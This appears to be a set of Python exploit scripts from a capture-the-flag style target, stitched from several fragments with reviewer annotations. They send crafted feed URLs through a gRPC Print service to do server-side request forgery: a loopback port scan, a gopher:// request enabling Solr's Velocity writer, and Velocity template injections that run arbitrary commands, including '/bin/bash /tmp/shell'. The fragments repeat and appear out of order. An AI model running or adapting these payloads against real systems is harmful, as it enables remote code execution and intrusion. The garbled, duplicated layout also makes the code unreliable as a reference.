def port_check(port):
    """Return ``(port, status)`` for one loopback port as observed through the remote Print service.

    Reconstructed from a collapsed one-line listing; the try/except layout below is
    inferred from statement order and should be confirmed against the original file.

    The check is indirect: a ``feed_url`` of ``http://localhost:<port>`` is sent to the
    PrintStub ``Feed`` RPC and the status is derived from the text of any exception the
    call raises. Nothing here touches the port itself.

    Args:
        port: port number (anything ``str`` accepts).

    Returns:
        ``(port_as_str, "OPEN")`` when the RPC error text contains ``'HTTP'``,
        ``(port_as_str, 'Closed')`` for any other exception, and
        ``(port_as_str, "unknown")`` when the RPC returns without raising.

    Relies on module-level names ``grpc``, ``pickle``, ``service_pb2``,
    ``service_pb2_grpc`` and ``b64encode`` that are not imported in this snippet.
    """
    port = str(port)
    # ``json`` is a plain string here and shadows the stdlib module name.
    json = '{"feed_url": "http://localhost:' + port + '" }'
    # print(json)
    # Plaintext gRPC channel (no TLS, no client auth) to a hard-coded address.
    channel = grpc.insecure_channel('10.10.10.201:9000')
    stub = service_pb2_grpc.PrintStub(channel)
    try:
        # The request carries a base64-encoded pickle of the JSON string. The receiving
        # service presumably unpickles it (not visible here); a server that unpickles
        # client-supplied bytes is exposed to unsafe deserialization and should use a
        # data-only format instead.
        payload = pickle.dumps(json)
        response = stub.Feed(service_pb2.Contents(data=b64encode(payload)))
    except Exception as e:
        # Status is a heuristic on the error message, not a socket-level result.
        # ``except Exception`` also catches unrelated failures (channel unavailable,
        # timeouts) and reports them as 'Closed'.
        if 'HTTP' in str(e):
            return port, "OPEN"
        return port, 'Closed'
    # ``response`` is never used; a successful call yields no classification.
    return port, "unknown"
from base64 import b64encode
import concurrent.futures  # only referenced in the commented-out block at the bottom

# NOTE(review): ``grpc``, ``pickle``, ``service_pb2`` and ``service_pb2_grpc`` are used
# below but not imported in this snippet; presumably imported elsewhere in the original.
# Reconstructed from a collapsed one-line listing; indentation is inferred.


def gen_payload(payload):
    """Return a JSON string whose ``feed_url`` is a gopher:// URL for localhost:8983 with *payload* appended.

    Args:
        payload: already percent-encoded text placed verbatim after
            ``gopher://localhost:8983/_``. No escaping is applied, so a double quote
            in *payload* would produce invalid JSON.

    Returns:
        The JSON string, built by concatenation rather than ``json.dumps``.
    """
    # ``json`` is a local string here and shadows the stdlib module name.
    json = '{"feed_url": "gopher://localhost:8983/_' + payload + '" }'
    # print(json)
    return json


# Plaintext gRPC channel (no TLS, no client auth) to a hard-coded address.
channel = grpc.insecure_channel('10.10.10.201:9000')
stub = service_pb2_grpc.PrintStub(channel)
# The argument is a percent-encoded HTTP request kept exactly as found (note the
# misspelled 'Contennt-Length' header name). The module-level ``payload`` is rebound
# twice below: first the JSON string, then its pickle bytes.
payload = gen_payload("POST%20/solr/staging/config%20Http/1.1%0AHost%20localhost:8983%0AContent-type:%20Application/json%0AContennt-Length:%20207%0A%0A%7B'updatequeryresponsewriter':'startup':'lazy','name':'velocity','class':'solr.VelocityResponseWriter','template.base.dir':%20'','solr.resource.loader.enabled':%20'true','params.resource.loader.enabled':%20'true'%7D%7D%0A")
# Base64-encoded pickle is what the service accepts. Server-side unpickling of client
# data is an unsafe-deserialization risk; the ``loads`` side is not visible here.
payload = pickle.dumps(payload)
response = stub.Feed(service_pb2.Contents(data=b64encode(payload)))
print(response)
# Earlier experiments, left commented out. ``port_check`` is not defined in this file.
# with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:
#     jobs = []
#     for port in range(0, 65535):
#         jobs.append(executor.submit(port_check, port))
#     for future in concurrent.futures.as_completed(jobs):
#         port, output = future.result()
#         print(f"{output} - {port}")
# print(port_check('8983'))
# channel = grpc.insecure_channel('10.10.10.201:9000')
# stub = service_pb2_grpc.PrintStub(channel)
# payload = pickle.dumps(port_check())
import grpc
import pickle
import service_pb2
import service_pb2_grpc
import base64
import sys
# ``func_set_timeout`` and ``FunctionTimedOut`` are imported but never used here.
from func_timeout import func_set_timeout, FunctionTimedOut
from urllib.parse import quote

# Reconstructed from a collapsed one-line listing; layout is inferred.

# Feed document skeleton; the literal "target" is replaced with the URL built below.
template = '{"version": "v1.0", "title": "PrinterFeed", "feed_url": "target"}'
# Plaintext gRPC channel (no TLS, no client auth) to a hard-coded address.
channel = grpc.insecure_channel("10.10.10.201:9000")
stub = service_pb2_grpc.PrintStub(channel)
# First CLI argument, percent-encoded for use inside a URL. ``sys.argv[1]`` raises
# IndexError when the script is run without an argument.
command = quote(sys.argv[1])
print(command)
# ``feed_url`` for the Solr instance on the remote host's loopback; the query string
# interpolates ``command`` into a Velocity template parameter. Kept verbatim.
payload = f"http://localhost:8983/solr/staging/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{command}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
# ``str.replace`` substitutes every occurrence of "target"; ``template`` contains one.
feed = template.replace("target", payload)
# The service accepts a base64-encoded pickle. Unpickling client-supplied bytes
# server-side is an unsafe-deserialization risk; the ``loads`` side is not visible here.
serialized = base64.b64encode(pickle.dumps(feed))
data = stub.Feed(service_pb2.Contents(data=serialized))
print(feed)
# Assumes the response message has a ``feed`` field (defined in service_pb2, not shown).
print(data.feed)
from base64 import b64encode
import concurrent.futures  # only referenced in the commented-out block at the bottom

# NOTE(review): ``grpc``, ``pickle``, ``service_pb2`` and ``service_pb2_grpc`` are used
# below but not imported in this snippet; presumably imported elsewhere in the original.
# Reconstructed from a collapsed one-line listing; indentation is inferred.


def gen_payload():
    """Return the fixed feed JSON string and echo it to stdout.

    Unlike the parameterised variant elsewhere on this page, nothing is configurable:
    the ``feed_url`` is a hard-coded Solr select URL whose query string carries a
    Velocity template parameter. The string is kept verbatim.

    Returns:
        The JSON string (a literal, not produced by ``json.dumps``).
    """
    # ``json`` is a local string here and shadows the stdlib module name.
    json = '{"version": "v1.0", "title": "PrinterFeed", "feed_url": "http://localhost:8983/solr/staging/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27/bin/bash%20/tmp/shell%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"}'
    print(json)
    return json


# Plaintext gRPC channel (no TLS, no client auth) to a hard-coded address.
channel = grpc.insecure_channel('10.10.10.201:9000')
stub = service_pb2_grpc.PrintStub(channel)
# ``payload`` is rebound: first the JSON string, then its base64-encoded pickle.
payload = gen_payload()
# Server-side unpickling of client data is an unsafe-deserialization risk; the
# ``loads`` side is not visible here.
payload = b64encode(pickle.dumps(payload))
response = stub.Feed(service_pb2.Contents(data=payload))
print(response)
# Earlier experiments, left commented out. ``port_check`` is not defined in this file.
# with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:
#     jobs = []
#     for port in range(0, 65535):
#         jobs.append(executor.submit(port_check, port))
#     for future in concurrent.futures.as_completed(jobs):
#         port, output = future.result()
#         print(f"{output} - {port}")
# print(port_check('8983'))
# channel = grpc.insecure_channel('10.10.10.201:9000')
# stub = service_pb2_grpc.PrintStub(channel)
# payload = pickle.dumps(port_check())
# response = stub.Feed(service_pb2.Contents(data=b64encode(payload)))